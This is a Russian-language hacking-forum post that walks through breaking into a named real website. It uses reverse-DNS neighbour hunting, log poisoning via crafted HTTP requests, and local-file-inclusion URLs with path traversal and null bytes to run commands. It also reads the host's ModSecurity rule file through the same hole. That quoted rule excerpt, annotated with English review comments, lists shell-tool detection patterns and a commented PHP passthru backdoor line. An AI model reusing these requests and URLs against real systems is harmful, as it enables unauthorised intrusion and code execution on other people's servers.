Сообщение от ta-kyn
=). Благодарю. А почему ..../../etc
//
passwd%00... ?
Вывод /etc/passwd - это хорошо, но выполнение своего кода лучше.
1) Заливка шелла через соседей.
Через реверс-DNS находим 35 сайтов, расположенных на том же сервере, что и libertarias.com.
На одном из сайтов (ud-garithos.com) стоит phpBB 3.0.7, в этой версии есть раскрытие путей, а шелл можно залить в картинке через аттач. К сожалению, версия оказалась пропатченной и путь узнать не удалось.
2) Внедрение кода в логи.
На сайте хостера (http://wiki.dreamhost.com/Finding_Causes_of_Heavy_Usage) узнаем, что логи хранятся в ~/logs/yourdomain.com/http/
Для внедрения кода в error.log выполняем запрос:
PHP код:
[COLOR="#000000"]GET /qwertyuiop HTTP/1.0
Host: www.libertarias.com
Referer: [COLOR="#0000BB"][/COLOR][/COLOR]
В access.log:
PHP код:
[COLOR="#000000"]GET / HTTP/1.0
Host: www.libertarias.com
Referer: [COLOR="#0000BB"][/COLOR][/COLOR]
Примеры:
PHP код:
[COLOR="#000000"]GET /qwertyuiop HTTP/1.0
Host: www.libertarias.com
Referer: [COLOR="#0000BB"][/COLOR][/COLOR]
Код:
http://www.libertarias.com/?op=../../../../home/libertarias/logs/libertarias.com/http/error.log%00&qwe=ls
PHP код:
[COLOR="#000000"]GET / HTTP/1.0
Host: www.libertarias.com
Referer: [COLOR="#0000BB"][/COLOR][/COLOR]
Код:
http://www.libertarias.com/?op=../../../../home/libertarias/logs/libertarias.com/http/access.log%00&qwe=ls
p.s.: не забывай про Mod Security
Код:
http://www.libertarias.com/?op=../../../../dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf%00&
PHP код:
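# ModSecurity rule excerpt (Atomicorp "gotroot" delayed feed, the
# 50_asl_rootkits.conf file as quoted on the page). The forum colour markup
# has been stripped and the whitespace between each SecRule's variable and
# operator restored; the rule text itself is reproduced as quoted.
#
# NOTE(review): the page shows this file being read through the same
# path-traversal parameter that is used for the log files. A readable WAF
# configuration tells an attacker exactly which signatures are active and
# which are switched off by the SecRuleRemoveById lines at the end. Apache
# typically reads its configuration as root before dropping privileges, so
# the rule files can be left unreadable to the web-server user; in any case
# the WAF is only defence in depth behind fixing the include vulnerability
# in the application itself.

#Body sigs
SecRule REQUEST_HEADERS_NAMES "x_(?:key|file)\b" \
"capture,phase:2,t:none,t:lowercase,status:404,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Backdoor access',id:390146,severity:'2',logdata:'%{TX.0}'"
#c99 rootshell
# NOTE(review): id:390146 is reused from the header rule above. Recent
# ModSecurity releases require rule ids to be unique, so this excerpt would
# need distinct ids before it loads there.
SecRule REQUEST_URI "(?:\.php\?act=(chmod&f|cmd|ls|f&f)|cx529\.php|\.php\?(?:phpinfo|mtnf|p0k3r)|/shell[0-9]?\.php|/\.get\.php)" \
"capture,id:390146,rev:17,severity:2,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Command shell attack: PHP exploit shell attempting to run command',logdata:'%{TX.0}'"
#URI sigs
SecRule REQUEST_URI "/(?:(?:cse|cmd)\.(?:c|dat|gif|jpe?g|png|sh|txt|bmp|dat|txt|js|tmp|php(?:3|4|5)?|asp)|(?:terminatorX-?exp|[a-z](?:cmd|command)[0-9]?)\.(?:gif|jpe?g|txt|bmp|php(?:3|4|5)?|png)\?|cmd(?:\.php(?:3|4|5)?|dat)|/(?:a|ijoo|oinc|s|sep|ipn|pro18|(php(?:3|4|5)?)?|shell|(?:o|0|p)wn(?:e|3)d|xpl|ssh2|too20|php(?:3|4|5)?backdoor|dblib|sfdg2)\.(?:c|dat|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp|php(?:3|4|5)?|asp)\?&(?:command|cmd)=|\.it/viewde|/(?:gif|jpe?g|ion|lala|shell|/ipn|php(?:3|4|5)?shell)\.(?:php?(?:3|4|5)?|tml)|tool[12][0-9]?\.(?:ph(?:p(?:3|4|5)?|tml)|js)\?|therules25?\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?|\.dump/(bash|httpd)\.(?:txt|php?(?:3|4|5)?|gif|jpe?g|dat|bmp|png|\;| )|suntzu\.php?(?:3|4|5)?\?cmd|proxysx\.(?:gif|jpe?g|bmp|txt|asp|png)\?|shell.txt|scan1\.0/scan/|(?:/bind|/juax|linuxdaybot)\.(gif|jpe?g|txt|bmp|png)|docLib/cmd\.asp)" \
"capture,id:390800,rev:3,severity:2,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Possible Rootkit attack: Generic Attempt to run rootkit',logdata:'%{TX.0}'"
#generic payload
#if (isset($_GET['cmd'])) passthru(stripslashes($_GET['cmd']));
SecRule REQUEST_URI|ARGS|REQUEST_BODY "(?:rapidleech checker script|rapidleech plugmod - auto download|rapidleech|You are not allowed to leech from|alt=\"rapidleech plugmod|.*rapidleech|src=\"http://www\.rapidleech\.com/logo\.gif)" \
"phase:4,t:lowercase,ctl:auditLogParts=+E,auditlog,status:404,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Unauthorized Download Client - Rapidleech',id:'390900',rev:8,severity:'2'"
SecRule RESPONSE_HEADERS:WWW-Authenticate "basic realm.*rapidleech" \
"capture,phase:3,ctl:auditLogParts=+E,auditlog,status:404,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Unauthorized Download Client - Rapidleech',id:'390903',rev:1,severity:'2',logdata:'%{TX.0}'"
#WWW-Authenticate: Basic realm=\"RAPIDLEECH PLUGMOD
# NOTE(review): this rule is scoped to the single argument ARGS:cmd, so as a
# detection control it is narrow; matching on ARGS (all request arguments)
# would widen coverage. It is a signature for one shell convention, not a
# substitute for removing user-controlled input from include()/passthru().
SecRule ARGS:cmd "(?:ls -|find /|mysqldump |ifconfig |php |echo |perl |killall |kill |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |wget |lwp-(?:download|request|mirror|rget) |uname |cvs |svn |(?:s|r)(?:cp|sh) |net(?:stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |g?cc |cpp |g\+\+ |/s?bin/(?:xterm|id|bash|sh|echo|kill|chmod|ch?sh|python|perl|nasm|ping|mail|ssh|netstat|php|route))" \
"capture,id:390904,rev:4,severity:2,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Possible PHP Shell Command Attempt',logdata:'%{TX.0}'"
SecRule ARGS:ev "^print [0-9];" \
"capture,id:390905,rev:1,severity:2,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Possible PHP Shell Command Attempt',logdata:'%{TX.0}'"

# Rule ids disabled on this host: 390144, 390145, 390147, 390148, 390149,
# 390801 and 390902 (rules from the same feed, not quoted above). The
# repeated lines are reproduced as quoted; each id is removed once no matter
# how many times it is listed. A defender reviewing this host should check
# why these signatures were switched off rather than tuned.
SecRuleRemoveById 390144
SecRuleRemoveById 390145
SecRuleRemoveById 390148
SecRuleRemoveById 390149
SecRuleRemoveById 390144
SecRuleRemoveById 390149
SecRuleRemoveById 390149
SecRuleRemoveById 390149
SecRuleRemoveById 390149
SecRuleRemoveById 390147
SecRuleRemoveById 390149
SecRuleRemoveById 390147
SecRuleRemoveById 390149
SecRuleRemoveById 390149
SecRuleRemoveById 390149
SecRuleRemoveById 390149
SecRuleRemoveById 390147
SecRuleRemoveById 390149
SecRuleRemoveById 390149
SecRuleRemoveById 390149
SecRuleRemoveById 390149
SecRuleRemoveById 390149
SecRuleRemoveById 390148
SecRuleRemoveById 390801
SecRuleRemoveById 390148
SecRuleRemoveById 390145
SecRuleRemoveById 390902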